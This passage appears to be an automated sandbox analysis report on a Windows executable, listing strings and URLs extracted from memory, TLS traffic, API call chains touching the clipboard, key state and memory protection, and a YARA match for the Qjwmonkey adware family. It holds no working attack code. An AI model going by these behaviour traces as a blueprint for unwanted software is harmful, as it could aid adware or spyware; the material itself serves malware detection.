        Source: nv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
        Source: nv8401986_110422.exe, nv8401986_110422.exe, 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
        Source: nv8401986_110422.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
        Source: nv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
        Source: nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
        Source: nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
        Source: nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
        Source: nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
        Source: nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
        Source: nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
        Source: nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
        Source: nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
        Source: nv8401986_110422.exe, 00000000.00000003.2016577008.0000000000823000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.googl%
        Source: nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google
        Source: nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
        Source: nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
        Source: nv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3295020523.000000000CA3E000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288186724.000000000B8A0000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3286827192.000000000B6D0000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3296835768.000000000CCA6000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000413A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3292301623.000000000C0B6000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004114000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288793430.000000000B939000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2049616047.000000000AEA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ent-api.msn.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://events-sandbox.data.microsoftstart.com/OneCollector/1.0https://browser.events.data.microsoft
        Source: nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://events-sandbox.data.msn.cn/OneCollector/1.0
        Source: nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://events-sandbox.data.msn.com/OneCollector/1.0
        Source: search[1].htm.0.drString found in binary or memory: https://github.com/GoogleChrome/chrome-launcher/blob/main/docs/chrome-flags-for-tools.md
        Source: nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/GoogleChrome/chrome-launcher/blob/main/docs/chrome-flags-for-tools.md)y
        Source: nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/GoogleChrome/chrome-launcher/blob/main/docs/chrome-flags-for-tools.mdix
        Source: nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/GoogleChrome/chrome-launcher/blob/main/docs/chrome-flags-for-tools.mdq
        Source: nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006B3B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2034852726.0000000006B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/GoogleChrome/chrome-launcher/blob/main/docs/chrome-flags-for-tools.mdy
        Source: nv8401986_110422.exe, 00000000.00000003.2034852726.0000000006B06000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/RaicuE
        Source: nv8401986_110422.exe, 00000000.00000003.2034852726.0000000006B06000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Raicup
        Source: search[1].htm.0.drString found in binary or memory: https://github.com/Raicuparta/rai-pal/discussions/185
        Source: nv8401986_110422.exe, 00000000.00000003.2041511987.0000000004127000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Raicuparta/rai-pal/discussions/185T
        Source: search[1].htm.0.drString found in binary or memory: https://github.com/Raicuparta/rai-pal/issues/145
        Source: nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Raicuparta/rai-pal/issues/145(
        Source: nv8401986_110422.exe, 00000000.00000003.2034852726.0000000006B06000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Raicuparta/rai-pal/issues/145W
        Source: nv8401986_110422.exe, 00000000.00000003.2034852726.0000000006B06000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2033997079.0000000006B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Raicuparta/rai-pal/issues/145y=
        Source: nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0
        Source: nv8401986_110422.exe, 00000000.00000003.2052497302.000000000BC74000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2065743355.0000000008EB8000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2065764959.0000000008EB9000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2065716314.0000000008EB7000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3282842388.0000000008EB8000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2065803582.0000000008EBC000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2065784346.0000000008EBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1735914355&rver=6.0.5286.0&wp=MBI_SSL&wre
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2035873967.000000000407F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comx
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3285360334.000000000B130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/error?code=50058#/wx
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/error?code=50058J
        Source: nv8401986_110422.exe, 00000000.00000002.3296835768.000000000CCA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/en-us/news/us/about-us/ar-BBN0NAKInternet
        Source: nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2016646782.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://payments.google.com/
        Source: nv8401986_110422.exe, 00000000.00000003.2200217510.0000000008F13000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2074406692.0000000008F13000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3283793163.0000000008F13000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2074767391.0000000008F14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rcf.fRmsDeferundefinedhttps://raka.aRmsDeferevent.customhttps://rafd.https://r.(
        Source: nv8401986_110422.exe, 00000000.00000003.2016577008.0000000000823000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sandbox.google.c(
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com/b
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com/b?rn=1735914359603&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.m
        Source: nv8401986_110422.exe, 00000000.00000003.2072800327.0000000008EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://storage.live.com/users/0x
        Source: nv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
        Source: nv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
        Source: nv8401986_110422.exeString found in binary or memory: https://www.digicert.com/CPS0
        Source: nv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
        Source: nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2016646782.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/E
        Source: nv8401986_110422.exe, 00000000.00000003.2016577008.0000000000823000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
        Source: nv8401986_110422.exe, 00000000.00000003.2016577008.0000000000823000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstorev
        Source: nv8401986_110422.exe, 00000000.00000003.2016646782.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
        Source: nv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
        Source: nv8401986_110422.exe, 00000000.00000002.3295256133.000000000CAB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3274337460.000000000083C000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3274337460.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3290088545.000000000BBB0000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004088000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2049616047.000000000AEA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
        Source: nv8401986_110422.exe, 00000000.00000002.3286827192.000000000B6D0000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3292301623.000000000C0B6000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2049616047.000000000AEA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp#lang=en-us&adsReferer=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp&devi
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp(n
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp-1-0
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp/?
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp/?ocid=iehp...1.png
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp00
        Source: nv8401986_110422.exe, 00000000.00000003.2035873967.0000000004088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp1
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp3.6.3.min.jsmillis:
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp3.6.3.min.jstandard
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp3.6.3.min.jstps://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/l
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp48
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp6
        Source: nv8401986_110422.exe, 00000000.00000003.2049616047.000000000AEA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp=i.Arra
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpC:
        Source: nv8401986_110422.exe, 00000000.00000002.3278061822.00000000046F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpL
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpP
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpT
        Source: nv8401986_110422.exe, 00000000.00000002.3289369777.000000000BA40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpTelemetryInitOptions.get
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpZ
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpe
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpell
        Source: nv8401986_110422.exe, 00000000.00000002.3285524155.000000000B3C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehphttps://www.msn.com/?ocid=iehp
        Source: nv8401986_110422.exe, 00000000.00000002.3297885994.000000000CD80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehphttps://www.msn.com/?ocid=iehphttps://www.msn.com/?ocid=iehp/0https://
        Source: nv8401986_110422.exe, 00000000.00000002.3274337460.00000000008C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpionmethod
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpn
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpn-
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpng
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpp/?LinkId=255141/?ocid=iehp
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpp0
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehptPrototypeOf?O
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpv1/homePage/latest/midlevel/experience.b374b0d5b40196862f17.js
        Source: nv8401986_110422.exe, 00000000.00000002.3295450038.000000000CB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/PV.xmlGQ=MS.News.Web.AdImpressionX
        Source: nv8401986_110422.exe, 00000000.00000002.3295450038.000000000CB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/nachrichten/topgeschichten/impressum/ar-BB5wWbz
        Source: nv8401986_110422.exe, 00000000.00000002.3296835768.000000000CCA6000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3285360334.000000000B130000.00000004.00000020.00020000.00000000.sdmp, experience.b374b0d5b40196862f17[1].js.0.drString found in binary or memory: https://www.msn.com/fr-ch/actualite/other/Mentions-l
        Source: nv8401986_110422.exe, 00000000.00000002.3295450038.000000000CB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/fr-fr/actualite/microsoftnews/qui-sommes-nous/ar-AA135Z7yhttps://www.msn.com/de-
        Source: nv8401986_110422.exe, 00000000.00000002.3296835768.000000000CCA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/id-id/berita/nasional/tentang-kami/ar-BBca8ZEhttps://www.msn.com/it-it/notizie/m
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.comP
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.comc
        Source: nv8401986_110422.exe, 00000000.00000002.3295256133.000000000CAB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.comnewsAndInterests
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.comsn.com)
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.5:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 18.244.18.122:443 -> 192.168.2.5:49725 version: TLS 1.2
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004AA100 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_004AA100
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004AA100 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_004AA100
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004AA940 GetKeyState,GetKeyState,GetKeyState,GetKeyState,lstrlenW,lstrlenW,lstrlenW,0_2_004AA940

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Yara detected Qjwmonkey
        Source: Yara matchFile source: 0.2.nv8401986_110422.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: nv8401986_110422.exe PID: 768, type: MEMORYSTR
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0048BDF0 GetProcAddress,RtlInitializeCriticalSection,__Init_thread_footer,RtlEnterCriticalSection,LoadLibraryA,GetProcAddress,RtlLeaveCriticalSection,NtProtectVirtualMemory,_strstr,_strstr,0_2_0048BDF0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0048F380: DeviceIoControl,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,0_2_0048F380
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0048C0600_2_0048C060
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004920700_2_00492070
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004E60D00_2_004E60D0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004623700_2_00462370
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004944200_2_00494420
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_005404C00_2_005404C0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004365300_2_00436530
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004406E00_2_004406E0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004686F00_2_004686F0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_005308400_2_00530840
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_005249000_2_00524900
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004949800_2_00494980
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004A2B200_2_004A2B20
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00492BA00_2_00492BA0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0045CDE00_2_0045CDE0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00490EA00_2_00490EA0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004D8F000_2_004D8F00
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_005172400_2_00517240
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_005173010_2_00517301
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0051D3D00_2_0051D3D0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004134D00_2_004134D0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004F14800_2_004F1480
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0051D85C0_2_0051D85C
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004238C00_2_004238C0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_0041D9D00_2_0041D9D0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_004439D00_2_004439D0
        Source: C:\Users\user\Desktop\nv8401986_110422.exeCode function: 0_2_00491A400_2_00491A40
